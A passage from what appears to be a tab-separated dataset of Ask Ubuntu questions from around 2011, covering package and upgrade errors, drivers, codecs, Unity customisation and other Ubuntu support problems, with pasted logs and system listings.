its a followup error from a previous failure . no apport report written because the error message indicates its a followup error from a previous failure . no apport report written because maxreports is reached already no apport report written because maxreports is reached already not configured yet . package libglu1 is not installed . package libglu1-mesa which provides libglu1 is not configured yet . dpkg : error processing libwxgtk2.8-0 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of python-wxgtk2.8 : python-wxgtk2.8 depends on libwxgtk2.8-0 ( > = 2.8.11.0 ) ; however : package libwxgtk2.8-0 is not configured yet . dpkg : error processing python-wxgtk2.8 ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of playonlinux : playonlinux depends on python-wxgtk2.8 ; however : package python-wxgtk2.8 is not configured yet . dpkg : error processing playonlinux ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : libgl1-mesa-glx libglu1-mesa libwxgtk2.8-0 python-wxgtk2.8 playonlinux n : ignoring file 'getdeb.list.bck ' in directory '/etc/apt/sources.list.d/ ' as it has an invalid filename extension e : sub-process /usr/bin/dpkg returned an error code ( 1 ) raffaele @ natty : ~ $ cat /etc/apt/sources.list # deb cdrom : [ ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) ] / natty main restricted deb-src http : //ubuntu.fastbull.org/ubuntu/ natty restricted main # added by software-properties # deb cdrom : [ ubuntu 11.04 _natty narwhal_ - release amd64 ( 20110427.1 ) ] / natty main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //it.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse # deb-src http : //it.archive.ubuntu.com/ubuntu/ natty-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu natty partner deb-src http : //archive.canonical.com/ubuntu natty partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu natty main deb-src http : //extras.ubuntu.com/ubuntu natty main deb http : //ubuntu.fastbull.org/ubuntu/ natty main universe restricted multiverse deb-src http : //ubuntu.fastbull.org/ubuntu/ natty universe multiverse # added by software-properties deb http : //security.ubuntu.com/ubuntu/ natty-security universe main multiverse restricted deb-src http : //ubuntu.fastbull.org/ubuntu/ natty-security universe main multiverse restricted # added by software-properties deb http : //ubuntu.fastbull.org/ubuntu/ natty-updates universe main multiverse restricted deb-src http : //ubuntu.fastbull.org/ubuntu/ natty-updates universe main multiverse restricted # added by software-properties deb http : //ubuntu.fastbull.org/ubuntu/ natty-proposed universe main multiverse restricted deb-src http : //ubuntu.fastbull.org/ubuntu/ natty-proposed universe main multiverse restricted # added by software-properties deb http : //ubuntu.fastbull.org/ubuntu/ natty-backports universe main multiverse restricted deb-src http : //ubuntu.fastbull.org/ubuntu/ natty-backports universe main multiverse restricted # added by software-properties # deb http : //ppa.launchpad.net/tobydox/ultrastardx/ubuntu maverick main # deb-src http : //ppa.launchpad.net/tobydox/ultrastardx/ubuntu maverick main # deb http : //ppa.launchpad.net/banshee-team/ppa/ubuntu natty main # deb-src http : //ppa.launchpad.net/banshee-team/ppa/ubuntu natty main # deb http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu natty main # deb-src http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu natty main # deb http : //download.virtualbox.org/virtualbox/debian natty contrib # deb-src http : //download.virtualbox.org/virtualbox/debian natty contrib # deb http : //ppa.launchpad.net/kernel-ppa/ppa/ubuntu natty main # deb-src http : //ppa.launchpad.net/kernel-ppa/ppa/ubuntu natty main # deb http : //archive.getdeb.net/ubuntu natty-getdeb apps # deb-src http : //archive.getdeb.net/ubuntu natty-getdeb apps # deb http : //ppa.launchpad.net/cdemu/ppa/ubuntu natty main # deb-src http : //ppa.launchpad.net/cdemu/ppa/ubuntu natty main # deb http : //ppa.launchpad.net/elementaryart/elementary-dev/ubuntu natty main # deb-src http : //ppa.launchpad.net/elementaryart/elementary-dev/ubuntu natty main
58975	not able to upgrade my ubuntu distro	i am using my ubuntu 10.04 lucid.i wanted to do upgrade my distro to 10.10.when i am doing distro upgradation in update manager.i get the error message.i have tried even via console as well as i am uploading the log file which has the details of that issue . could you please suggest to resolve this issue ? i think sources.list.distupgrade was corrupted. ? /var/log/main.log 2011-08-28 16:59:33,085 info using config files ' [ './distupgrade.cfg ' ] ' 2011-08-28 16:59:33,086 info uname information : 'linux gridlex-laptop 2.6.32-33-generic # 70-ubuntu smp thu jul 7 21:09:46 utc 2011 i686' 2011-08-28 16:59:33,087 info creating state file with ' [ 'tar ' , '-z ' , '-c ' , '-f ' , '/var/log/dist-upgrade/system_state.tar.gz ' , '/etc/apt/preferences.d/ ' , '/etc/apt/sources.list ' , '/etc/apt/sources.list.d/ ' , '/var/lib/dpkg/status ' ] ' 2011-08-28 16:59:33,382 info release-upgrader version '0.142.20 ' started 2011-08-28 16:59:33,386 debug using 'distupgradeviewtext ' view 2011-08-28 16:59:33,425 debug aufsoptionsandenvironmentsetup ( ) 2011-08-28 16:59:33,427 debug using '/tmp/upgrade-rw-aj6lhj ' as aufs_rw_dir 2011-08-28 16:59:33,427 debug using '/tmp/upgrade-chroot-p2erqd ' as aufs chroot dir 2011-08-28 16:59:33,428 debug enable dpkg -- force-overwrite 2011-08-28 16:59:33,537 debug lsb-release : 'lucid' 2011-08-28 16:59:33,550 debug who -m -- ips : 'gridlex pts/0 2011-08-28 16:21 ( :0.0 ) ' 2011-08-28 16:59:33,552 debug _pythonsymlinkcheck run 2011-08-28 16:59:33,568 debug opencache ( ) 2011-08-28 16:59:34,017 debug /opencache ( ) , new cache size 30616 2011-08-28 16:59:34,018 debug needservermode ( ) : run in 'desktop ' mode , ( because of pkg 'ubuntu-desktop ' ) 2011-08-28 16:59:34,018 debug checkviewdepends ( ) 2011-08-28 16:59:34,019 debug running doupdate ( ) ( showerrors=false ) 2011-08-28 16:59:41,227 debug opencache ( ) 2011-08-28 16:59:41,627 debug /opencache ( ) , new cache size 30616 2011-08-28 16:59:41,627 debug dopostinitialupdate 2011-08-28 16:59:41,628 debug plugin modules in ./plugins : deb_plugin.py dpkg_status_plugin.py kdelibs4to5_plugin.py langpack_manual_plugin.py remove_lilo_plugin.py 2011-08-28 16:59:41,628 debug loading module ./plugins/deb_plugin.py 2011-08-28 16:59:41,630 debug plugins in < module 'deb_plugin ' from './plugins/deb_plugin.py ' > : < class 'deb_plugin.debplugin ' > 2011-08-28 16:59:41,630 debug loading module ./plugins/dpkg_status_plugin.py 2011-08-28 16:59:41,633 debug plugins in < module 'dpkg_status_plugin ' from './plugins/dpkg_status_plugin.py ' > : < class 'dpkg_status_plugin.dpkgstatusplugin ' > 2011-08-28 16:59:41,634 debug loading module ./plugins/kdelibs4to5_plugin.py 2011-08-28 16:59:41,642 debug plugins in < module 'kdelibs4to5_plugin ' from './plugins/kdelibs4to5_plugin.py ' > : < class 'kdelibs4to5_plugin.kdelibs4devtokdelibs5devplugin ' > 2011-08-28 16:59:41,642 debug loading module ./plugins/langpack_manual_plugin.py 2011-08-28 16:59:41,644 debug plugins in < module 'langpack_manual_plugin ' from './plugins/langpack_manual_plugin.py ' > : < class 'langpack_manual_plugin.marklangpacksmanuallyinstalledplugin ' > 2011-08-28 16:59:41,644 debug loading module ./plugins/remove_lilo_plugin.py 2011-08-28 16:59:41,645 debug plugins in < module 'remove_lilo_plugin ' from './plugins/remove_lilo_plugin.py ' > : < class 'remove_lilo_plugin.removeliloplugin ' > 2011-08-28 16:59:41,645 debug plugins for condition 'postinitialupdate ' are ' [ ] ' 2011-08-28 16:59:41,645 debug plugins for condition 'maverickpostinitialupdate ' are ' [ ] ' 2011-08-28 16:59:41,645 debug plugins for condition 'from_lucidpostinitialupdate ' are ' [ ] ' 2011-08-28 16:59:45,880 debug foreign : google-talkplugin google-chrome-stable skype acroread adobeair 2011-08-28 16:59:45,880 debug obsolete : firefox-locale-en teamviewer6 language-support-translations-en nautilus-dropbox equinox-theme gtk2-engines-equinox linux-image-2.6.28-11-generic lucidor xul-ext-ubufox yammer 2011-08-28 16:59:45,881 debug updatesourceslist ( ) 2011-08-28 16:59:45,946 debug rewritesourceslist ( ) 2011-08-28 16:59:45,949 debug examining : 'deb http : //bd.archive.ubuntu.com/ubuntu/ lucid main restricted' 2011-08-28 16:59:45,949 debug entry 'deb http : //bd.archive.ubuntu.com/ubuntu/ maverick main restricted ' updated to new dist 2011-08-28 16:59:45,950 debug examining : 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ lucid main restricted' 2011-08-28 16:59:45,950 debug entry 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ maverick main restricted ' updated to new dist 2011-08-28 16:59:45,950 debug examining : 'deb http : //bd.archive.ubuntu.com/ubuntu/ lucid-updates main restricted' 2011-08-28 16:59:45,950 debug entry 'deb http : //bd.archive.ubuntu.com/ubuntu/ maverick-updates main restricted ' updated to new dist 2011-08-28 16:59:45,950 debug examining : 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ lucid-updates main restricted' 2011-08-28 16:59:45,950 debug entry 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ maverick-updates main restricted ' updated to new dist 2011-08-28 16:59:45,950 debug examining : 'deb http : //bd.archive.ubuntu.com/ubuntu/ lucid universe' 2011-08-28 16:59:45,951 debug entry 'deb http : //bd.archive.ubuntu.com/ubuntu/ maverick universe ' updated to new dist 2011-08-28 16:59:45,951 debug examining : 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ lucid universe' 2011-08-28 16:59:45,951 debug entry 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ maverick universe ' updated to new dist 2011-08-28 16:59:45,951 debug examining : 'deb http : //bd.archive.ubuntu.com/ubuntu/ lucid-updates universe' 2011-08-28 16:59:45,951 debug entry 'deb http : //bd.archive.ubuntu.com/ubuntu/ maverick-updates universe ' updated to new dist 2011-08-28 16:59:45,951 debug examining : 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ lucid-updates universe' 2011-08-28 16:59:45,952 debug entry 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ maverick-updates universe ' updated to new dist 2011-08-28 16:59:45,952 debug examining : 'deb http : //bd.archive.ubuntu.com/ubuntu/ lucid multiverse' 2011-08-28 16:59:45,952 debug entry 'deb http : //bd.archive.ubuntu.com/ubuntu/ maverick multiverse ' updated to new dist 2011-08-28 16:59:45,952 debug examining : 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ lucid multiverse' 2011-08-28 16:59:45,952 debug entry 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ maverick multiverse ' updated to new dist 2011-08-28 16:59:45,952 debug examining : 'deb http : //bd.archive.ubuntu.com/ubuntu/ lucid-updates multiverse' 2011-08-28 16:59:45,952 debug entry 'deb http : //bd.archive.ubuntu.com/ubuntu/ maverick-updates multiverse ' updated to new dist 2011-08-28 16:59:45,952 debug examining : 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ lucid-updates multiverse' 2011-08-28 16:59:45,953 debug entry 'deb-src http : //bd.archive.ubuntu.com/ubuntu/ maverick-updates multiverse ' updated to new dist 2011-08-28 16:59:45,953 debug examining : 'deb http : //security.ubuntu.com/ubuntu lucid-security main restricted' 2011-08-28 16:59:45,953 debug entry 'deb http : //security.ubuntu.com/ubuntu maverick-security main restricted ' updated to new dist 2011-08-28 16:59:45,953 debug examining : 'deb-src http : //security.ubuntu.com/ubuntu lucid-security main restricted' 2011-08-28 16:59:45,953 debug entry 'deb-src http : //security.ubuntu.com/ubuntu maverick-security main restricted ' updated to new dist 2011-08-28 16:59:45,953 debug examining : 'deb http : //security.ubuntu.com/ubuntu lucid-security universe' 2011-08-28 16:59:45,954 debug entry 'deb http : //security.ubuntu.com/ubuntu maverick-security universe ' updated to new dist 2011-08-28 16:59:45,954 debug examining : 'deb-src http : //security.ubuntu.com/ubuntu lucid-security universe' 2011-08-28 16:59:45,954 debug entry 'deb-src http : //security.ubuntu.com/ubuntu maverick-security universe ' updated to new dist 2011-08-28 16:59:45,954 debug examining : 'deb http : //security.ubuntu.com/ubuntu lucid-security multiverse' 2011-08-28 16:59:45,954 debug entry 'deb http : //security.ubuntu.com/ubuntu maverick-security multiverse ' updated to new dist 2011-08-28 16:59:45,954 debug examining : 'deb-src http : //security.ubuntu.com/ubuntu lucid-security multiverse' 2011-08-28 16:59:45,954 debug entry 'deb-src http : //security.ubuntu.com/ubuntu maverick-security multiverse ' updated to new dist 2011-08-28 16:59:45,955 debug examining : 'deb http : //archive.canonical.com/ubuntu maverick partner # added by software-center' 2011-08-28 16:59:45,955 debug entry 'deb http : //archive.canonical.com/ubuntu maverick partner # added by software-center ' is already set to new dist 2011-08-28 16:59:45,955 debug examining : 'deb http : //dl.google.com/linux/chrome/deb/ stable main' 2011-08-28 16:59:45,959 debug entry ' # deb http : //dl.google.com/linux/chrome/deb/ stable main # disabled on upgrade to maverick ' was disabled ( unknown mirror ) 2011-08-28 16:59:45,959 debug examining : 'deb http : //dl.google.com/linux/talkplugin/deb/ stable main' 2011-08-28 16:59:45,963 debug entry ' # deb http : //dl.google.com/linux/talkplugin/deb/ stable main # disabled on upgrade to maverick ' was disabled ( unknown mirror ) 2011-08-28 16:59:45,994 debug running doupdate ( ) ( showerrors=true ) 2011-08-28 17:00:43,609 debug opencache ( ) 2011-08-28 17:00:43,609 debug failed to systemunlock ( ) ( e : not locked ) 2011-08-28 17:00:47,427 debug /opencache ( ) , new cache size 32521 2011-08-28 17:00:47,427 debug needservermode ( ) : run in 'desktop ' mode , ( because of pkg 'ubuntu-desktop ' ) 2011-08-28 17:02:09,560 error dist-upgrade failed : 'e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . ' 2011-08-28 17:02:09,561 debug abort called 2011-08-28 17:02:09,568 debug opencache ( ) 2011-08-28 17:02:09,568 debug failed to systemunlock ( ) ( e : not locked ) 2011-08-28 17:02:12,205 debug /opencache ( ) , new cache size 30616 2011-08-28 17:02:12,205 debug enabling apt cron job
58979	add user that can read / write a root , www-data files	how can i do that ? i got user amira on my ubuntu 11.4 , i want him to able to see / read / write a root user files such as /etc/* and apache files
58980	how do i stop wireless from reactivating after waking from suspend ?	in ubuntu ( gnome ) i right click on the network manager icon and untick `` enable wireless '' because i 'm using ethernet for now . then i suspend my ubuntu computer . when i wake my ubuntu computer it starts scanning for wi-fi connections . ubuntu has re-enabled wireless ! any bright ideas on how to make ubuntu honour my `` enable wireless '' settings between suspends ?
58983	how do i install ubuntu one in kubuntu ?	how can i install ubuntu one in kubuntu ?
58985	customization for quicklists of unity is reverted after reboot	i followed the instructions here to modify my quicklists of unity . for examples in order to add an `` root terminal '' item i modified my gnome-terminal.desktop as follows : [ desktop entry ] name=terminal comment=use the command line tryexec=gnome-terminal exec=gnome-terminal icon=utilities-terminal type=application x-gnome-docpath=gnome-terminal/index.html x-gnome-bugzilla-bugzilla=gnome x-gnome-bugzilla-product=gnome-terminal x-gnome-bugzilla-component=bugbuddybugs x-gnome-bugzilla-version=2.32.1 categories=gnome ; gtk ; utility ; terminalemulator ; startupnotify=true onlyshowin=gnome ; unity ; x-ubuntu-gettext-domain=gnome-terminal x-ayatana-desktop-shortcuts=root ; [ root shortcut group ] name=root terminal exec=gksudo gnome-terminal targetenvironment=unity and then i dragged it to the launcher . it worked fine before rebooting . but after the system is restarted , the terminal button launcher is reverted ( no root terminal after right click ) , despite of the desktop file has been modified . so what steps do i miss ? thanks for those who gives hints .
58988	how to send keystrokes to chrome in ubuntu ?	i would like my computer to press the esc key every 2 minutes . how can i do this ? with and app or shell script or otherwise ?
58996	how do i develop an ubuntu application in html and js ?	i am developing an app and i think html and javascript are better for the future , but i can not find any tutorials ( i need the app to use the system theme ) . are there bindings for unity , message menu and notification , couchdb and so on ?
58997	is it possible to set dash to show a black background instead of generated from the wallpaper ?	i prefer natty 's `` black '' dash background as opposed to the color-adopting background found in oneiric . will oneiric have a setting to change the default color and allow the dash to have a black background ? or can this not be changed ?
58998	blank screen after inactive time	i am using ubuntu 11.04 , on a dell vostro 1510 . if i am inactive for a certain time , the screen usually gets locked and the login prompt will be there . yes sometimes i am able to see the login screen and logging in as normal . but sometimes after its locked and when the mouse or keyboard is moved also nothing happens . this is happening for the second time . and its not happening always . i can switch from one terminal to other from the locked screen with alt + + ctrl f1 etc . but when i switch to the graphical one with alt + ctrl + f7 ( from the locked time ) i can see only a blank screen . i tried once login in ( alt + ctrl + f1 ) and trying to startx , but it said something was locked and want to delete the lock and try . so i removed do n't remember what exactly it was . but it too was not a success , i was forced to press the powerbutton . is this a bug ? i saw some but all are happening for switching users . never experienced after logging out , but this happens only when its locked automatically actually . update : i strongly feel this is a bug . as i upgraded to 11.10 , i did n't noticed the same issues . but at some point if any one has an answer , you can post it . i can approve .
59001	how to find the last listing of installed application thru apt	how to find the last listing of installed application on ubuntu . is there any way to find thru apt . i see that command '' last '' - used to listing of last logged users . is there any similar tool for last installed application listing on ubuntu .
59007	defragging ntfs partitions from linux	are there any tools that i can use to defrag my windows partition from linux ?
59013	user friendly way to access an mtp device ( android 3.0 tablet )	is there a user friendly way to access a mtp device from ubuntu such as an android 3.0 tablet ? thanks .
59014	how can i make chromium app windows count as `` their own application '' in the unity launcher ?	i 'm trying to add a chromium app window ( chromium-browser -- app=http : //example.org ) to the launcher . i 've put together a .desktop file and it works , but all instances of chromium get lumped together . if i 've got a normal browser window already running , the app will be listed with chromium . if i start the appwindow first , normal chromium windows will be listed with it . is there a way to stop this from happening ?
59015	how to setup ipsec effectively ** whats the use of xl2tpd ?	how to setup ipsec effectively on lan so that i can securely use from a machine of different external network . whats the significance of xl2tpd . i see that ipsec is faster than openvpn . also i would like to know if something like hotspot shield can be implemented lan , where they assign a different ip address on after establishing secure vpn . ** i see the fact that hotspot shield server are located in usa . **ipsec is a kernel implementation while openvpn is a userspace implementation
59017	why does minecraft crash on lubuntu but not ubuntu ?	i have lubuntu and ubuntu partitions on my drive . i 've been having an interesting time with the new lubuntu partition . i 've encountered strange things with the game minecraft , java and graphics drivers on the lubuntu partition . firstly , i 'll say that minecraft runs fine at about 60fps on the ubuntu partition with the latest drivers . ( this is lower than it should be as it 's a pretty decent graphics card [ radeon hd 5700 ] . ) when i first started lubuntu , i tried to see if i could get minecraft running on java . java crashed when loading the main game graphics on both sun and openjdk without proprietary drivers . java also crashed on both javas with proprietary drivers after the necessary restart . however , after disabling ( with 'remove ' button ) the proprietary drivers with jockey-gtk in the session after the restart to install the drivers , minecraft ran very well at ~120fps . this did n't continue after another restart , when it ran at 9fps . after failing thereafter on lubuntu to get it working at > 15fps , i tried reinstalling lubuntu and installed the exact same driver ( the latest one , not the one appearing on jockey ) and java versions as on ubuntu . that is , now ubuntu and lubuntu have the same graphics driver and java version . minecraft still crashes in the same way on lubuntu but works fine on ubuntu . i would appreciate any explanation for any of these events . what differences between lubuntu and ubuntu could cause this ? edit : after installing the 32bit driver version on lubuntu ( seeing as lubuntu is 32bit ) , i have java `` working '' for minecraft . however , it is at < 15fps again and it ca n't log in to servers as it takes too long .
59019	how can i access an ubuntu raid device from windows ?	i have ubuntu installed on an ext4 raid1 with windows 7 on another disk . the raid is a software riad setup in ubuntu . i 've used the ext2fsd project to mount normal ext4 systems , and it works well . when i try to mount one of the raid disks , i get a `` uuid is 0 '' error . i 'm wondering if anyone knows a way to access my raid in windows . i 've seen this question , but the only answer that mentions a software raid does n't really offer any evidence .
59025	how to use global hotkeys when in fullscreen game ?	none of the global shortcuts work when i 'm using any fullscreen game , including alt+tab . i ca n't get out of the game until i use some kind of `` exit '' option , ca n't start/stop the music player ... this is especially annoying on my laptop , as fullscreen applications increase the brightness to the maximal value ( which is another problem , but i think they have a common root ) , and i ca n't change it . i use kubuntu 11.10 .
59026	why do i get a 'connection closed ' error when trying to branch a launchpad branch ?	when i try to branch any launchpad branch i keep getting the following error : ssh_exchange_identification : connection closed by remote host bzr : error : connection closed : unexpected end of message . please check connectivity and permissions , and report a bug if problems persist . and the branching fails . occasionally it works as normal but most of the time i get this error . why is this happening and how can i solve it ?
59035	how do i disable global gnome shortcuts in gnome-terminal ?	bash has a myriad of useful shortcuts . for instance alt+b , which moves the cursor back one word . only i have assigned this particular combination and a few other shortcuts to do things in gnome . the trouble is , i 've gotten used to it . alt+b opens my browser and i 'd like for it to stay that way , except when i work in gnome terminal . hence my question : how do i disable global shortcuts , ( like the one to open my browser ) and enable bash 's own shortcuts , exclusively when working in gnome-terminal ? is there a way to tell gnome that the active/focused application 's shortcuts take precedence over global shortcuts ?
59036	is it possible to use album art as an icon for a folder in nautilus elementary ?	i run ubuntu 11.04 with nautilus elementary . is it possible in nautilus to use album art as an icon ( miniature ) of a folder where the album is stored ?
59037	how to get nvidia driver working properly ( running experimental 3d support )	when typing into terminal lspci , the output for the graphics card is vga compatible controller : intel corporation core processor integrated graphics controller ( rev 18 ) but , further down there is vga compatible controller : nvidia corporation device 0dd3 ( rev a1 ) now i know i have an integrated graphics card , but the regular nvidia driver wont work properly , thus forced to use the nouveau driver . and for some reason i suspect the nouveau driver is giving me a hard time letting me connect to a large hdtv via hdmi . help ? ninja edit : if i install the nvidia driver , it just says not in use , and it defaults me to gnome , so i cant use unity , while the nouveau driver works perfectly..minus not working when i try to connect an external moniter
59043	iphone mounting problem : idevicepair command not found	i 've been following the instructions in this answer for trying to read my iphone from ubuntu . i 'm still getting the error in the question . under edit 2 of the answer it says to run idevicepair unpair but i tried that and just get idevicepair : command not found tried installing idevicepair but no package can be located . what do i need to do to get my iphone ( 3gs ) working under ubuntu ( 11.04 ) ?
59044	bumblebee and amd radeon cards	does bumblebee ( https : //github.com/bumblebee-project/bumblebee ) work with amd radeon hd/intel cards or just with nvidia/intel cards ? should i always run applications using optirun before the command name ? thanks .
59048	why ca n't i stream music to my ipad ?	i think that i uploaded 13 songs while in ubuntu this afternoon . when i opened the app on the ipad , it said i need to subscribe to the streaming music service . i did . i entered my account information but i still ca n't find the songs . what else should i do ?
59050	ssd or usb for htpc/homeserver ( only the os )	i have a htpc / homeserver ( apache2 , mysql for some website testing ) and i also use it as a htpc . my current setup is , it is in my bedroom , the os is installed on a 2 tb drive , but at night the os starts writing or reading some stuff from the disk . it is quite annoying as it does not spin down completely and makes noise , which irritates me : p. i was thinking of putting the os on a usb drive or an ssd . but what would be the best option ? is getting the ssd the best option ? i 'd like some pro 's and con 's . : )
59056	how do i recover the launcher ?	my 7 yr old son recently attempted to get on the computer and rebooted it somehow . now the launcher is missing and i am unable to use the system . i have rebooted several times with the same results , but do n't see anything other than the wallpaper .
59060	mplayer error : `` can not find codec for audio format 0x55 ''	i 'm running : lubuntu 10.10 mplayer 2:1.0~rc4~try1.dsfg1-1ubuntu1+medibuntu1 w32codecs 1:20110131-0.1medibuntu3 while trying to play a streaming rtsp clip with mplayer , i get an error message saying : can not find codec for audio format 0x55 . according to here , audio format 0x55 is `` mpeg-1 layer 3 ( mp3 ) '' , and should be supported by l3codeca.acm . i do have l3codeca.acm in /usr/lib/codecs . however , when mplayer tries to load this codec , it says ( see full log below ) : opening audio decoder : [ acm ] win32/acm decoders loading codec dll : 'l3codeca.acm' loaded dll driver l3codeca.acm at 212d000 acm_decoder : unappropriate audio format could not load/initialize win32/acm audio codec ( missing dll file ? ) . it looks like this guy has the same issue , but he is playing a local file . according to mplayer 's codec status table , this codec `` conflicts with security kernel patches '' , but i 'm not sure what that means . any ideas ? i do n't specifically need this to work in mplayer , i just want to be able to play it . however , vlc and openrtmp did n't work for me either ( although i may not have been using openrtmp correctly ) . here 's all the information mplayer spits out : $ mplayer rtsp : //rs2.sichosinenglish.org:554/sie/heritage/01.mp3 mplayer 1.0rc4-4.4.5 ( c ) 2000-2010 mplayer team mplayer : could not connect to socket mplayer : no such file or directory failed to open lirc support . you will not be able to use your remote control . playing rtsp : //rs2.sichosinenglish.org:554/sie/heritage/01.mp3 . resolving rs2.sichosinenglish.org for af_inet6 ... could n't resolve name for af_inet6 : rs2.sichosinenglish.org resolving rs2.sichosinenglish.org for af_inet ... connecting to server rs2.sichosinenglish.org [ 75.99.96.252 ] : 554 ... rtsp_session : session can not be established . stream_live555 , url : rtsp : //rs2.sichosinenglish.org:554/sie/heritage/01.mp3 stream not seekable ! file format detected . initiated `` audio/x-mp3-draft-00 '' rtp subsession on port 36274 ========================================================================== opening audio decoder : [ mp3lib ] mpeg layer-2 , layer-3 adecoder init failed : ( adecoder init failed : ( requested audio codec family [ mpg123 ] ( afm=mpg123 ) not available . enable it at compilation . opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders can not find codec 'mp3float ' in libavcodec ... adecoder init failed : ( adecoder init failed : ( opening audio decoder : [ ffmpeg ] ffmpeg/libavcodec audio decoders unknown/missing audio format - > no sound adecoder init failed : ( requested audio codec family [ mad ] ( afm=libmad ) not available . enable it at compilation . opening audio decoder : [ acm ] win32/acm decoders loading codec dll : 'l3codeca.acm' loaded dll driver l3codeca.acm at 212d000 acm_decoder : unappropriate audio format could not load/initialize win32/acm audio codec ( missing dll file ? ) . adecoder preinit failed : ( adecoder init failed : ( opening audio decoder : [ hwmpa ] mpeg audio pass-through ( fake decoder ) can not sync mpa frame : 0 adecoder init failed : ( adecoder init failed : ( can not find codec for audio format 0x55 . audio : no sound video : no video exiting ... ( end of file ) `
59062	`` a script on this page may be busy , or it may have stopped responding '' everytime i wake up my laptop	whenever i wake up my laptop after a few hours or more have past , the laptop takes a minute or more to wake up , making a lot of noise calculating something , and when finally it starts becoming somehow usable , firefox shows me the message : a script on this page may be busy , or it may have stopped responding . you can stop the script now , or you can continue to see if the script will complete . script : resource : //gre/modules/xpcomutils.jsm:282 sometimes it is other scripts . obviously it does not happen when i close firefox before closing the lid , and waking up is much faster . it might be linked to gmail specifically . any idea what is going on and how to stop it from happening ? natty/lenovo thinkpad r500/ati
59064	how to run a checkdisk ?	i suspect there might be bad sector on a disk . what tool is the best equivalent of the error checking tool of windows ? ( i used ext3 )
59066	dv6325us and ar9002wb-1ng	i have recently added an atheros ar9002wb-1ng wifi combo card to my hp pavilion dv6325us laptop . i had to modify my bios to get the wifi to work , but the bluetooth is n't working . it 's not even detected . * lspci * 00:00.0 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.1 ram memory : nvidia corporation c51 memory controller 0 ( rev a2 ) 00:00.2 ram memory : nvidia corporation c51 memory controller 1 ( rev a2 ) 00:00.3 ram memory : nvidia corporation c51 memory controller 5 ( rev a2 ) 00:00.4 ram memory : nvidia corporation c51 memory controller 4 ( rev a2 ) 00:00.5 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.6 ram memory : nvidia corporation c51 memory controller 3 ( rev a2 ) 00:00.7 ram memory : nvidia corporation c51 memory controller 2 ( rev a2 ) 00:02.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:03.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:05.0 vga compatible controller : nvidia corporation c51 [ geforce go 6150 ] ( rev a2 ) 00:09.0 ram memory : nvidia corporation mcp51 host bridge ( rev a2 ) 00:0a.0 isa bridge : nvidia corporation mcp51 lpc bridge ( rev a3 ) 00:0a.1 smbus : nvidia corporation mcp51 smbus ( rev a3 ) 00:0a.3 co-processor : nvidia corporation mcp51 pmu ( rev a3 ) 00:0b.0 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0b.1 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0d.0 ide interface : nvidia corporation mcp51 ide ( rev f1 ) 00:0e.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev f1 ) 00:10.0 pci bridge : nvidia corporation mcp51 pci bridge ( rev a2 ) 00:10.1 audio device : nvidia corporation mcp51 high definition audio ( rev a2 ) 00:14.0 bridge : nvidia corporation mcp51 ethernet controller ( rev a3 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 03:00.0 network controller : atheros communications 